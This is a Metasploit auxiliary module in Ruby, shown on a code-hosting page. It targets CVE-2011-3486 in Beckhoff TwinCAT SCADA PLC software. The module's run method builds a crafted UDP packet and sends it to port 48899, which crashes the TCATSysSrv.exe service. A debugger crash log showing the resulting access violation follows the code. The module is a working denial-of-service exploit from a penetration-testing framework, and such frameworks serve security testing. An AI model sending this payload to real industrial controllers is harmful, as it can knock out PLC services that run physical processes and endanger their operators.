Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/scada/beckhoff_twincat.rb
19612 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Udp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS',

15
        'Description' => %q{

16
          The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending

17
          a crafted UDP packet to port 48899 (TCATSysSrv.exe).

18
        },

19
        'Author' => [

20
          'Luigi Auriemma', # Public exploit

21
          'jfa', # Metasploit module

22
        ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2011-3486' ],

26
          [ 'OSVDB', '75495' ],

27
          [ 'URL', 'http://aluigi.altervista.org/adv/twincat_1-adv.txt' ]

28
        ],

29
        'DisclosureDate' => '2011-09-13',

30
        'Notes' => {

31
          'Stability' => [CRASH_SERVICE_DOWN],

32
          'SideEffects' => [],

33
          'Reliability' => []

34
        }

35
      )

36
    )

37


38
    register_options([Opt::RPORT(48899)])

39
  end

40


41
  def run

42
    dos = "\x03\x66\x14\x71" + "\x00" * 16 + "\xff" * 1514

43
    connect_udp

44
    print_status('Sending DoS packet ...')

45
    udp_sock.put(dos)

46
    disconnect_udp

47
  end

48
end

49


50
=begin

51
0:017> g

52
(4d4.850): Access violation - code c0000005 (first chance)

53
First chance exceptions are reported before any exception handling.

54
This exception may be expected and handled.

55
eax=02a1f9cf ebx=0037c0a8 ecx=02a0f9cc edx=ffffffff esi=02a0f9b4 edi=00000001

56
eip=00414f6a esp=02a0f7bc ebp=0000ffff iopl=0         nv up ei pl nz ac po cy

57
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010213

58
*** ERROR: Module load completed but symbols could not be loaded for C:\TwinCAT\TCATSysSrv.exe

59
TCATSysSrv+0x14f6a:

60
00414f6a 66833802        cmp     word ptr [eax],2         ds:0023:02a1f9cf=????

61
0:016> k

62
ChildEBP RetAddr

63
WARNING: Stack unwind information not available. Following frames may be wrong.

64
02a0f7f8 71ab265b TCATSysSrv+0x14f6a

65
02a0f80c 71ab4a9e WS2_32!Prolog_v1+0x21

66
02a0f834 7c90df3c WS2_32!WPUQueryBlockingCallback+0x1b

67
02a0f880 71a5332f ntdll!NtWaitForSingleObject+0xc

68
02a0f8f4 71abf6e7 mswsock!WSPRecvFrom+0x35c

69
02a0f938 71ad303a WS2_32!WSARecvFrom+0x7d

70
02a0f96c 00414b92 WSOCK32!recvfrom+0x39

71
02a0f988 00000000 TCATSysSrv+0x14b92

72
=end

73


74